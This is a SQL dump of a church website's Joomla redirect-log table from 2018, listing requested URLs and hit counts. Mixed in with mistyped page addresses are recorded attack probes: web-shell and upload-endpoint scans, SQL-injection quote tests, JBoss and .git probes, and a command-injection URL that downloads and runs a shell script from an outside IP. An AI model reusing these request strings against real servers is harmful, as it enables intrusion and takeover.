(7887, 'https://www.lifeoasisinternationalchurch.org/a58acc3e-af88-3b40-835a-7de6c53e1c15/2356e836-af7a-ca43-b8c6-6e622a1f95b0/shutdown?get&nocache=16df3', NULL, 'https://www.lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2018-03-18 11:01:56', '0000-00-00 00:00:00', 301),
(7888, 'https://lifeoasisinternationalchurch.org/resources/dod', NULL, '', '', 6, 0, '2018-03-19 10:23:26', '0000-00-00 00:00:00', 301),
(7889, 'https://www.lifeoasisinternationalchurch.org/41-prayer-a-fasting-day-32', NULL, '', '', 9, 0, '2018-03-19 14:43:26', '0000-00-00 00:00:00', 301),
(7890, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/sermons', NULL, '', '', 1, 0, '2018-03-21 04:13:14', '0000-00-00 00:00:00', 301),
(7891, 'https://lifeoasisinternationalchurch.org/7-kindom-builder/49-prophetic-words-for-day-39', NULL, '', '', 2, 0, '2018-03-21 07:32:29', '0000-00-00 00:00:00', 301),
(7892, 'https://lifeoasisinternationalchurch.org/ministries/gin', NULL, '', '', 9, 0, '2018-03-21 21:34:18', '0000-00-00 00:00:00', 301),
(7893, 'https://lifeoasisinternationalchurch.org/wp-dbs.php', NULL, '', '', 1, 0, '2018-03-21 23:40:24', '0000-00-00 00:00:00', 301),
(7894, 'https://lifeoasisinternationalchurch.org/an.php', NULL, '', '', 1, 0, '2018-03-21 23:44:06', '0000-00-00 00:00:00', 301),
(7895, 'https://lifeoasisinternationalchurch.org/function-sync.php', NULL, '', '', 1, 0, '2018-03-21 23:47:35', '0000-00-00 00:00:00', 301),
(7896, 'https://lifeoasisinternationalchurch.org/loicforum/archive/index.php', NULL, 'https://lifeoasisinternationalchurch.org/loicforum/archive/index.php', '', 2387, 0, '2018-03-22 08:34:00', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(7897, 'https://www.lifeoasisinternationalchurch.org/12-sample-content/17-sample-content-6', NULL, '', '', 1, 0, '2018-03-22 11:31:49', '0000-00-00 00:00:00', 301),
(7898, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/19-army-of-the-lord-2', NULL, '', '', 5, 0, '2018-03-22 17:12:41', '0000-00-00 00:00:00', 301),
(7899, 'https://lifeoasisinternationalchurch.org/cfg-contactform-1/inc/upload.php', NULL, 'http://lifeoasisinternationalchurch.org/cfg-contactform-1/inc/upload.php', '', 1, 0, '2018-03-22 17:13:53', '0000-00-00 00:00:00', 301),
(7900, 'https://lifeoasisinternationalchurch.org/gobcwel.html', NULL, '', '', 5, 0, '2018-03-23 00:24:40', '0000-00-00 00:00:00', 301),
(7901, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/50-prayer-a-fasting-day-40', NULL, '', '', 1, 0, '2018-03-23 06:41:18', '0000-00-00 00:00:00', 301),
(7902, 'https://lifeoasisinternationalchurch.org/partnership.php', NULL, '', '', 9, 0, '2018-03-23 11:35:06', '0000-00-00 00:00:00', 301),
(7903, 'https://lifeoasisinternationalchurch.org/dreamcentre.php', NULL, '', '', 10, 0, '2018-03-23 21:12:42', '0000-00-00 00:00:00', 301),
(7904, 'https://www.lifeoasisinternationalchurch.org/vision.php', NULL, '', '', 12, 0, '2018-03-23 22:39:35', '0000-00-00 00:00:00', 301),
(7905, 'https://lifeoasisinternationalchurch.org/ministries/mimmp', NULL, '', '', 14, 0, '2018-03-24 20:16:42', '0000-00-00 00:00:00', 301),
(7906, 'https://142.4.21.132//cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=& allcfgconv -c voip -c -o - ../../../../../var/tmp/voip.cfg &', NULL, '', '', 1, 0, '2018-03-25 11:51:19', '0000-00-00 00:00:00', 301),
(7907, 'https://lifeoasisinternationalchurch.org/ckupload/ckupload.php', NULL, '', '', 1, 0, '2018-03-25 19:36:01', '0000-00-00 00:00:00', 301),
(7908, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=4dsyboztzse', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 2, 0, '2018-03-25 20:18:54', '0000-00-00 00:00:00', 301),
(7909, 'https://lifeoasisinternationalchurch.org/loicforum/index.php', NULL, 'https://lifeoasisinternationalchurch.org/loicforum/index.php', '', 4, 0, '2018-03-26 00:28:57', '0000-00-00 00:00:00', 301),
(7910, 'https://www.lifeoasisinternationalchurch.org/vision.html', NULL, '', '', 6, 0, '2018-03-26 06:17:35', '0000-00-00 00:00:00', 301),
(7911, 'https://lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/17-sample-content-6', NULL, '', '', 1, 0, '2018-03-26 15:10:27', '0000-00-00 00:00:00', 301),
(7912, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/16738', NULL, '', '', 1, 0, '2018-03-26 15:51:39', '0000-00-00 00:00:00', 301),
(7913, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/10185', NULL, '', '', 1, 0, '2018-03-26 16:01:46', '0000-00-00 00:00:00', 301),
(7914, 'https://lifeoasisinternationalchurch.org/xml/rss/', NULL, '', '', 1, 0, '2018-03-26 21:33:23', '0000-00-00 00:00:00', 301),
(7915, 'https://lifeoasisinternationalchurch.org/rss/', NULL, '', '', 1, 0, '2018-03-26 21:33:23', '0000-00-00 00:00:00', 301),
(7916, 'https://lifeoasisinternationalchurch.org/rssfeeds/', NULL, '', '', 1, 0, '2018-03-26 21:33:24', '0000-00-00 00:00:00', 301),
(7917, 'https://lifeoasisinternationalchurch.org/feeds/', NULL, '', '', 1, 0, '2018-03-26 21:33:25', '0000-00-00 00:00:00', 301),
(7918, 'https://lifeoasisinternationalchurch.org/pages/feeds/', NULL, '', '', 1, 0, '2018-03-26 21:33:25', '0000-00-00 00:00:00', 301),
(7919, 'https://lifeoasisinternationalchurch.org/index.php/131-20148', NULL, '', '', 3, 0, '2018-03-27 00:03:53', '0000-00-00 00:00:00', 301),
(7920, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content\'a=0&view=article&id=4&itemid=104', NULL, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content\'A=0&view=article&id=4&Itemid=104', '', 1, 0, '2018-03-27 13:45:51', '0000-00-00 00:00:00', 301),
(7921, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'a=0&id=4&itemid=104', NULL, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'A=0&id=4&Itemid=104', '', 1, 0, '2018-03-27 13:45:52', '0000-00-00 00:00:00', 301),
(7922, 'https://www.lifeoasisinternationalchurch.org/components/com_b2jcontact/css/', NULL, '', '', 1, 0, '2018-03-27 21:41:50', '0000-00-00 00:00:00', 301),
(7923, 'https://www.lifeoasisinternationalchurch.org/components/com_foxcontact/index.html', NULL, 'http://www.lifeoasisinternationalchurch.org/components/com_foxcontact/index.html', '', 1, 0, '2018-03-28 15:30:06', '0000-00-00 00:00:00', 301),
(7924, 'https://lifeoasisinternationalchurch.org/wp-content/plugins/fluid_forms/file-upload/server/php/', NULL, 'http://lifeoasisinternationalchurch.org/wp-content/plugins/fluid_forms/file-upload/server/php/', '', 1, 0, '2018-03-28 18:13:37', '0000-00-00 00:00:00', 301),
(7925, 'https://lifeoasisinternationalchurch.org/loicforum', NULL, '', '', 8, 0, '2018-03-28 19:21:03', '0000-00-00 00:00:00', 301),
(7926, 'https://142.4.21.132/.git/index', NULL, '', '', 1, 0, '2018-03-29 10:23:10', '0000-00-00 00:00:00', 301),
(7927, 'https://lifeoasisinternationalchurch.org/efs2018', NULL, '', '', 1, 0, '2018-03-29 16:37:15', '0000-00-00 00:00:00', 301),
(7928, 'https://lifeoasisinternationalchurch.org/efs', NULL, '', '', 1, 0, '2018-03-29 16:37:24', '0000-00-00 00:00:00', 301),
(7929, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=zb6xbb2mprs', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-03-29 21:20:38', '0000-00-00 00:00:00', 301),
(7930, 'https://lifeoasisinternationalchurch.org/protocol.html', NULL, '', '', 5, 0, '2018-03-29 21:42:48', '0000-00-00 00:00:00', 301),
(7931, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=5&itemid=5', NULL, '', '', 2, 0, '2018-03-30 06:18:56', '0000-00-00 00:00:00', 301),
(7932, 'https://lifeoasisinternationalchurch.org/asom2016', NULL, '', '', 5, 0, '2018-03-30 10:41:48', '0000-00-00 00:00:00', 301),
(7933, 'https://www.lifeoasisinternationalchurch.org/18-loic/35-trm', NULL, '', '', 3, 0, '2018-03-30 13:45:08', '0000-00-00 00:00:00', 301),
(7934, 'https://lifeoasisinternationalchurch.org/letter', NULL, '', '', 4, 0, '2018-03-30 15:43:56', '0000-00-00 00:00:00', 301),
(7935, 'https://lifeoasisinternationalchurch.org/steward', NULL, '', '', 3, 0, '2018-04-01 07:21:10', '0000-00-00 00:00:00', 301),
(7936, 'https://lifeoasisinternationalchurch.org/prayer/64-day-12', NULL, '', '', 3, 0, '2018-04-01 12:51:49', '0000-00-00 00:00:00', 301),
(7937, 'https://www.lifeoasisinternationalchurch.org/17-fp-headlines-lists/55-kb-zp', NULL, '', '', 1, 0, '2018-04-01 13:13:49', '0000-00-00 00:00:00', 301),
(7938, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=chpnniil1ik', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-04-01 16:23:06', '0000-00-00 00:00:00', 301),
(7939, 'https://lifeoasisinternationalchurch.org/33-prayer-a-fasting-day-24', NULL, '', '', 8, 0, '2018-04-01 18:20:37', '0000-00-00 00:00:00', 301),
(7940, 'https://lifeoasisinternationalchurch.org/mp3-messages/speaker/3-rev-mrs-oyenike-areogun', NULL, '', '', 2, 0, '2018-04-01 19:23:31', '0000-00-00 00:00:00', 301),
(7941, 'https://www.lifeoasisinternationalchurch.org/index.php/template-info/books', NULL, '', '', 5, 0, '2018-04-02 00:07:07', '0000-00-00 00:00:00', 301),
(7942, 'https://127.0.0.1/server_info', NULL, '', '', 1, 0, '2018-04-02 05:10:51', '0000-00-00 00:00:00', 301),
(7943, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=bgszddsp8ku', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 2, 0, '2018-04-02 05:23:12', '0000-00-00 00:00:00', 301),
(7944, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/18-army-of-the-lord-1', NULL, '', '', 11, 0, '2018-04-02 09:51:34', '0000-00-00 00:00:00', 301),
(7945, 'https://lifeoasisinternationalchurch.org/eyeblaster/addineyev2.html', NULL, '', '', 1, 0, '2018-04-02 10:49:39', '0000-00-00 00:00:00', 301),
(7946, 'https://lifeoasisinternationalchurch.org/ckupload.php', NULL, '', '', 1, 0, '2018-04-02 14:42:21', '0000-00-00 00:00:00', 301),
(7947, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=remind/index.php?option=com_user&view=register', NULL, '', '', 1, 0, '2018-04-03 18:45:47', '0000-00-00 00:00:00', 301),
(7948, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=remind/component/users/?view=registration', NULL, '', '', 1, 0, '2018-04-03 18:45:51', '0000-00-00 00:00:00', 301),
(7949, 'https://www.lifeoasisinternationalchurch.org/.config/git/config', NULL, '', '', 1, 0, '2018-04-04 02:20:48', '0000-00-00 00:00:00', 301),
(7950, 'https://lifeoasisinternationalchurch.org/m1.php', NULL, 'http://site.ru', '', 4, 0, '2018-04-04 03:53:47', '0000-00-00 00:00:00', 301),
(7951, 'https://lifeoasisinternationalchurch.org/wp-mains.php', NULL, 'http://site.ru', '', 2, 0, '2018-04-04 05:44:45', '0000-00-00 00:00:00', 301),
(7952, 'https://142.4.21.132/_asterisk/', NULL, '', '', 14, 0, '2018-04-04 10:40:44', '0000-00-00 00:00:00', 301),
(7953, 'https://www.lifeoasisinternationalchurch.org/prayer/58-prophetic-words-for-day-6', NULL, '', '', 3, 0, '2018-04-05 15:25:28', '0000-00-00 00:00:00', 301),
(7954, 'https://lifeoasisinternationalchurch.org/h4ck_.php', NULL, 'http://site.ru', '', 4, 0, '2018-04-06 01:16:05', '0000-00-00 00:00:00', 301),
(7955, 'https://lifeoasisinternationalchurch.org/verygs.php', NULL, 'http://site.ru', '', 4, 0, '2018-04-06 05:29:44', '0000-00-00 00:00:00', 301),
(7956, 'https://lifeoasisinternationalchurch.org/k.php', NULL, 'http://site.ru', '', 5, 0, '2018-04-06 07:12:49', '0000-00-00 00:00:00', 301),
(7957, 'https://www.lifeoasisinternationalchurch.org/12-sample-content/12-sample-content-1?tmpl=component&print=1&page=', NULL, '', '', 9, 0, '2018-04-06 08:31:23', '0000-00-00 00:00:00', 301),
(7958, 'https://lifeoasisinternationalchurch.org/.smileys/license.php', NULL, 'http://site.ru', '', 5, 0, '2018-04-06 12:52:36', '0000-00-00 00:00:00', 301),
(7959, 'https://lifeoasisinternationalchurch.org/.smileys/bacot.php', NULL, 'http://site.ru', '', 1, 0, '2018-04-06 13:26:15', '0000-00-00 00:00:00', 301),
(7960, 'https://lifeoasisinternationalchurch.org/.smileys/systems.php', NULL, 'http://site.ru', '', 3, 0, '2018-04-06 13:44:56', '0000-00-00 00:00:00', 301),
(7961, 'https://www.lifeoasisinternationalchurch.org/faith.html', NULL, '', '', 4, 0, '2018-04-06 17:45:45', '0000-00-00 00:00:00', 301),
(7962, 'https://lifeoasisinternationalchurch.org/.well-known/license.php', NULL, 'http://site.ru', '', 1, 0, '2018-04-07 09:18:15', '0000-00-00 00:00:00', 301),
(7963, 'https://lifeoasisinternationalchurch.org/component/vitabook/?new=true', NULL, '', '', 1, 0, '2018-04-07 09:41:57', '0000-00-00 00:00:00', 301),
(7964, 'https://lifeoasisinternationalchurch.org/component/option,com_jambook/itemid,255/task,add/', NULL, '', '', 1, 0, '2018-04-07 09:42:00', '0000-00-00 00:00:00', 301),
(7965, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=dqx0mb7xzdi', NULL, 'https://www.lifeoasisinternationalchurch.org/training', '', 3, 0, '2018-04-07 11:56:18', '0000-00-00 00:00:00', 301),
(7966, 'https://lifeoasisinternationalchurch.org/fghhgfs.php', NULL, 'http://site.ru', '', 1, 0, '2018-04-07 14:53:25', '0000-00-00 00:00:00', 301),
(7967, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload', '', 2, 0, '2018-04-07 16:55:02', '0000-00-00 00:00:00', 301),
(7968, 'https://www.lifeoasisinternationalchurch.org/resources/tranning', NULL, '', '', 1, 0, '2018-04-07 17:06:01', '0000-00-00 00:00:00', 301),
(7969, 'https://www.lifeoasisinternationalchurch.org/tranning', NULL, '', '', 1, 0, '2018-04-07 17:08:04', '0000-00-00 00:00:00', 301),
(7970, 'https://lifeoasisinternationalchurch.org/resources/private streaming', NULL, '', '', 4, 0, '2018-04-07 17:09:19', '0000-00-00 00:00:00', 301),
(7971, 'https://lifeoasisinternationalchurch.org/dsfghs.php', NULL, 'http://site.ru', '', 1, 0, '2018-04-07 20:48:22', '0000-00-00 00:00:00', 301),
(7972, 'https://lifeoasisinternationalchurch.org/component/kide/', NULL, '', '', 1, 0, '2018-04-07 23:11:55', '0000-00-00 00:00:00', 301),
(7973, 'https://www.lifeoasisinternationalchurch.org/resources/broadcast-schedule\'a=0', NULL, 'https://www.lifeoasisinternationalchurch.org/resources/broadcast-schedule\'A=0', '', 1, 0, '2018-04-07 23:49:00', '0000-00-00 00:00:00', 301),
(7974, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/33-prayer-a-fasting-day-24', NULL, '', '', 2, 0, '2018-04-08 00:54:08', '0000-00-00 00:00:00', 301),
(7975, 'https://lifeoasisinternationalchurch.org/prayer/7-kindom-builder/18-prayer-a-fasting-day', NULL, '', '', 1, 0, '2018-04-08 02:54:04', '0000-00-00 00:00:00', 301),
(7976, 'https://www.lifeoasisinternationalchurch.org/trainijg', NULL, '', '', 1, 0, '2018-04-08 06:54:26', '0000-00-00 00:00:00', 301),
(7977, 'https://lifeoasisinternationalchurch.org/traning', NULL, '', '', 2, 0, '2018-04-08 07:14:40', '0000-00-00 00:00:00', 301),
(7978, 'https://lifeoasisinternationalchurch.org/lifestreming', NULL, '', '', 1, 0, '2018-04-08 07:26:56', '0000-00-00 00:00:00', 301),
(7979, 'https://lifeoasisinternationalchurch.org/camilles.php', NULL, 'http://site.ru', '', 1, 0, '2018-04-08 08:44:09', '0000-00-00 00:00:00', 301),
(7980, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=zv9cqc9ienu', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 2, 0, '2018-04-08 20:33:46', '0000-00-00 00:00:00', 301),
(7981, 'https://lifeoasisinternationalchurch.org/18-prayer-a-fasting-day', NULL, '', '', 7, 0, '2018-04-09 05:50:15', '0000-00-00 00:00:00', 301),
(7982, 'https://www.lifeoasisinternationalchurch.org/.svn/entries', NULL, '', '', 4, 0, '2018-04-09 07:11:27', '0000-00-00 00:00:00', 301),
(7983, 'https://www.lifeoasisinternationalchurch.org/youtubegm', NULL, '', '', 1, 0, '2018-04-09 07:46:44', '0000-00-00 00:00:00', 301),
(7984, 'https://unite.nike.comhttps//unite.nike.com/login?appversion=400&experienceversion=332&uxid=com.nike.commerce.snkrs.web&locale=zh_cn&backendenvironment=identity&browser=google inc.&os=undefined&mobile=false&native=false&visit=1&visitor=1f94e2dc-7baa-47d4-9300-1966de7eb995', NULL, 'https://www.nike.com/cn/launch/?s=upcoming', '', 2, 0, '2018-04-09 08:36:02', '0000-00-00 00:00:00', 301),
(7985, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/34-prayer-a-fasting-day-25', NULL, '', '', 11, 0, '2018-04-09 20:45:06', '0000-00-00 00:00:00', 301),
(7986, 'https://lifeoasisinternationalchurch.org/resources/father-s-heart/18-loic/50-young-achievers', NULL, '', '', 8, 0, '2018-04-10 02:19:28', '0000-00-00 00:00:00', 301),
(7987, 'https://lifeoasisinternationalchurch.org/programmes.html', NULL, '', '', 4, 0, '2018-04-10 02:30:58', '0000-00-00 00:00:00', 301),
(7988, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/', NULL, '', '', 2, 0, '2018-04-10 15:51:57', '0000-00-00 00:00:00', 301),
(7989, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0', NULL, '', '', 22, 0, '2018-04-11 17:40:24', '0000-00-00 00:00:00', 301),
(7990, 'https://lifeoasisinternationalchurch.org/stng', NULL, '', '', 1, 0, '2018-04-11 22:12:06', '0000-00-00 00:00:00', 301),
(7991, 'https://lifeoasisinternationalchurch.org/sql/', NULL, '', '', 3, 0, '2018-04-12 12:02:03', '0000-00-00 00:00:00', 301),
(7992, 'https://lifeoasisinternationalchurch.org/:8880/get_password.php', NULL, '', '', 2, 0, '2018-04-12 14:58:40', '0000-00-00 00:00:00', 301),
(7993, 'https://www.lifeoasisinternationalchurch.org/sttreaming', NULL, '', '', 2, 0, '2018-04-13 05:02:33', '0000-00-00 00:00:00', 301),
(7994, 'https://lifeoasisinternationalchurch.org/streaming/privite', NULL, '', '', 1, 0, '2018-04-13 21:35:09', '0000-00-00 00:00:00', 301),
(7995, 'https://lifeoasisinternationalchurch.org/privite', NULL, '', '', 1, 0, '2018-04-13 21:35:40', '0000-00-00 00:00:00', 301),
(7996, 'https://www.lifeoasisinternationalchurch.org/private-streamung', NULL, '', '', 1, 0, '2018-04-13 22:58:16', '0000-00-00 00:00:00', 301),
(7997, 'https://www.lifeoasisinternationalchurch.org/:8880/get_password.php', NULL, '', '', 2, 0, '2018-04-14 05:17:15', '0000-00-00 00:00:00', 301),
(7998, 'https://www.lifeoasisinternationalchurch.org/pricing', NULL, '', '', 1, 0, '2018-04-14 10:08:11', '0000-00-00 00:00:00', 301),
(7999, 'https://lifeoasisinternationalchurch.org/proratestreaming', NULL, '', '', 1, 0, '2018-04-14 12:20:41', '0000-00-00 00:00:00', 301),
(8000, 'https://www.lifeoasisinternationalchurch.org/about.html', NULL, '', '', 15, 0, '2018-04-14 17:31:24', '0000-00-00 00:00:00', 301),
(8001, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/22-dealing-with-buts-in-your-life-2', NULL, '', '', 16, 0, '2018-04-14 17:47:06', '0000-00-00 00:00:00', 301),
(8002, 'https://www.lifeoasisinternationalchurch.org/invoker/jmxinvokerservlet', NULL, 'https://www.lifeoasisinternationalchurch.org/invoker/JMXInvokerServlet', '', 6, 0, '2018-04-14 21:29:19', '0000-00-00 00:00:00', 301),
(8003, 'https://lifeoasisinternationalchurch.org/invoker/jmxinvokerservlet', NULL, 'https://lifeoasisinternationalchurch.org/invoker/JMXInvokerServlet', '', 2, 0, '2018-04-14 22:48:11', '0000-00-00 00:00:00', 301),
(8004, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaming/traaining', NULL, '', '', 1, 0, '2018-04-15 06:04:38', '0000-00-00 00:00:00', 301),
(8005, 'https://www.lifeoasisinternationalchurch.org/resources/livlie-streaming', NULL, '', '', 1, 0, '2018-04-15 09:18:13', '0000-00-00 00:00:00', 301),
(8006, 'https://lifeoasisinternationalchurch.org/.svn/entries', NULL, 'http://www.google.com/', '', 3, 0, '2018-04-15 16:30:50', '0000-00-00 00:00:00', 301),
(8007, 'https://lifeoasisinternationalchurch.org/forums/', NULL, '', '', 3, 0, '2018-04-15 18:55:57', '0000-00-00 00:00:00', 301),
(8008, 'https://lifeoasisinternationalchurch.org/boards/', NULL, '', '', 2, 0, '2018-04-15 18:56:08', '0000-00-00 00:00:00', 301),
(8009, 'https://lifeoasisinternationalchurch.org/community/', NULL, '', '', 3, 0, '2018-04-15 18:56:26', '0000-00-00 00:00:00', 301),
(8010, 'https://lifeoasisinternationalchurch.org/board/', NULL, '', '', 2, 0, '2018-04-15 18:56:33', '0000-00-00 00:00:00', 301),
(8011, 'https://lifeoasisinternationalchurch.org/f/', NULL, '', '', 2, 0, '2018-04-15 18:56:46', '0000-00-00 00:00:00', 301),
(8012, 'https://lifeoasisinternationalchurch.org/ipb/', NULL, '', '', 2, 0, '2018-04-15 18:57:29', '0000-00-00 00:00:00', 301),
(8013, 'https://www.lifeoasisinternationalchurch.org/community/', NULL, '', '', 2, 0, '2018-04-15 18:58:19', '0000-00-00 00:00:00', 301),
(8014, 'https://www.lifeoasisinternationalchurch.org/board/', NULL, '', '', 2, 0, '2018-04-15 18:58:26', '0000-00-00 00:00:00', 301),
(8015, 'https://www.lifeoasisinternationalchurch.org/f/', NULL, '', '', 2, 0, '2018-04-15 18:58:33', '0000-00-00 00:00:00', 301),
(8016, 'https://www.lifeoasisinternationalchurch.org/ipb/', NULL, '', '', 1, 0, '2018-04-15 18:59:14', '0000-00-00 00:00:00', 301),
(8017, 'https://www.lifeoasisinternationalchurch.org/vbulletin/', NULL, '', '', 2, 0, '2018-04-15 18:59:22', '0000-00-00 00:00:00', 301),
(8018, 'https://www.lifeoasisinternationalchurch.org/forum/', NULL, '', '', 1, 0, '2018-04-15 19:02:31', '0000-00-00 00:00:00', 301),
(8019, 'https://www.lifeoasisinternationalchurch.org/forums/', NULL, '', '', 1, 0, '2018-04-15 19:02:37', '0000-00-00 00:00:00', 301),
(8020, 'https://www.lifeoasisinternationalchurch.org/boards/', NULL, '', '', 1, 0, '2018-04-15 19:02:50', '0000-00-00 00:00:00', 301),
(8021, 'https://lifeoasisinternationalchurch.org/blogs/', NULL, '', '', 1, 0, '2018-04-15 19:05:10', '0000-00-00 00:00:00', 301),
(8022, 'https://www.lifeoasisinternationalchurch.org/blogs/', NULL, '', '', 2, 0, '2018-04-15 19:06:26', '0000-00-00 00:00:00', 301),
(8023, 'https://lifeoasisinternationalchurch.org/music.lifeoasisinternationalchurch.org/', NULL, '', '', 9, 0, '2018-04-15 23:33:06', '0000-00-00 00:00:00', 301),
(8024, 'https://www.lifeoasisinternationalchurch.org/49-prophetic-words-for-day-39', NULL, '', '', 7, 0, '2018-04-15 23:37:06', '0000-00-00 00:00:00', 301),
(8025, 'https://www.lifeoasisinternationalchurch.org/loic/conventions.php', NULL, '', '', 2, 0, '2018-04-16 01:21:00', '0000-00-00 00:00:00', 301),
(8026, 'https://www.lifeoasisinternationalchurch.org/loic/prayerrequest.php', NULL, '', '', 10, 0, '2018-04-16 09:19:01', '0000-00-00 00:00:00', 301),
(8027, 'https://lifeoasisinternationalchurch.org/our-gallery', NULL, '', '', 2, 0, '2018-04-16 12:33:24', '0000-00-00 00:00:00', 301),
(8028, 'https://lifeoasisinternationalchurch.org/resources/blog/item/how to receive holy ghost baptism_files/0', NULL, '', '', 1, 0, '2018-04-16 19:05:32', '0000-00-00 00:00:00', 301),
(8029, 'https://lifeoasisinternationalchurch.org/resources/blog/item/how to receive holy ghost baptism_files/widget_iframe.4ed13d9ce94e60c41048ece32559b04c.html', NULL, '', '', 1, 0, '2018-04-16 19:05:32', '0000-00-00 00:00:00', 301),
(8030, 'https://unite.nike.comhttps//unite.nike.com/login?appversion=404&experienceversion=337&uxid=com.nike.commerce.snkrs.web&locale=zh_cn&backendenvironment=identity&browser=google inc.&os=undefined&mobile=false&native=false&visit=2&visitor=c515fa95-20f8-43a8-acec-078ab53c4ee6', NULL, 'https://www.nike.com/cn/launch/?s=upcoming', '', 1, 0, '2018-04-17 09:03:24', '0000-00-00 00:00:00', 301),
(8031, 'https://lifeoasisinternationalchurch.org/unz.php', NULL, '', '', 2, 0, '2018-04-17 10:43:53', '0000-00-00 00:00:00', 301),
(8032, 'https://lifeoasisinternationalchurch.org/message.php', NULL, '', '', 21, 0, '2018-04-18 01:22:35', '0000-00-00 00:00:00', 301),
(8033, 'https://lifeoasisinternationalchurch.org/sites/default/files/up.php', NULL, 'http://lifeoasisinternationalchurch.org/sites/default/files/up.php', '', 2, 0, '2018-04-19 06:13:40', '0000-00-00 00:00:00', 301),
(8034, 'https://lifeoasisinternationalchurch.org/resources/daily-bible-reading', NULL, '', '', 3, 0, '2018-04-19 20:33:39', '0000-00-00 00:00:00', 301),
(8035, 'https://lifeoasisinternationalchurch.org/resources/hd/18-loic/50-young-achievers', NULL, '', '', 7, 0, '2018-04-20 13:06:55', '0000-00-00 00:00:00', 301),
(8036, 'https://lifeoasisinternationalchurch.org/payload.php', NULL, '', '', 2, 0, '2018-04-20 13:11:11', '0000-00-00 00:00:00', 301),
(8037, 'https://lifeoasisinternationalchurch.org/get.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg', NULL, '', '', 2, 0, '2018-04-20 18:27:15', '0000-00-00 00:00:00', 301),
(8038, 'https://lifeoasisinternationalchurch.org/user/password', NULL, '', '', 3, 0, '2018-04-20 19:22:29', '0000-00-00 00:00:00', 301),
(8039, 'https://lifeoasisinternationalchurch.org/sitemap.xml.php', NULL, '', '', 1, 0, '2018-04-21 02:07:49', '0000-00-00 00:00:00', 301),
(8040, 'https://142.4.21.132/invoker/readonly', NULL, '', '', 1, 0, '2018-04-21 10:53:34', '0000-00-00 00:00:00', 301),
(8041, 'https://142.4.21.132/jbossmq-httpil/httpserverilservlet', NULL, '', '', 1, 0, '2018-04-21 10:53:35', '0000-00-00 00:00:00', 301),
(8042, 'https://142.4.21.132/plugins/weathermap/configs/conn.php?id=wget -o apche2017.sh http://222.184.79.11:5317/apche2017.sh;chmod 777 apche2017.sh;./apche2017.sh', NULL, '', '', 1, 0, '2018-04-21 10:53:36', '0000-00-00 00:00:00', 301),
(8043, 'https://www.lifeoasisinternationalchurch.org//plus/mytag_js.php?aid=9090', NULL, 'http://www.lifeoasisinternationalchurch.org//plus/mytag_js.php?aid=9090', '', 1, 0, '2018-04-21 10:59:23', '0000-00-00 00:00:00', 301),
(8044, 'https://www.lifeoasisinternationalchurch.org//plus/mytag_js.php?aid=6022', NULL, 'http://www.lifeoasisinternationalchurch.org//plus/mytag_js.php?aid=6022', '', 1, 0, '2018-04-21 10:59:26', '0000-00-00 00:00:00', 301),
(8045, 'https://www.lifeoasisinternationalchurch.org/loic/kingdombuilders.php', NULL, '', '', 10, 0, '2018-04-21 21:25:19', '0000-00-00 00:00:00', 301),
(8046, 'https://www.lifeoasisinternationalchurch.org/pastor training', NULL, '', '', 1, 0, '2018-04-22 06:39:09', '0000-00-00 00:00:00', 301),
(8047, 'https://www.lifeoasisinternationalchurch.org/strimming', NULL, '', '', 1, 0, '2018-04-22 07:56:01', '0000-00-00 00:00:00', 301),
(8048, 'https://www.lifeoasisinternationalchurch.org/resources/blog/item/how to receive holy ghost baptism_files/widget_iframe.83d5793f6ebbe2046330abda6016ae93.html', NULL, '', '', 3, 0, '2018-04-22 08:25:13', '0000-00-00 00:00:00', 301),
(8049, 'https://www.lifeoasisinternationalchurch.org/prayer-request', NULL, '', '', 19, 0, '2018-04-22 14:19:06', '0000-00-00 00:00:00', 301),
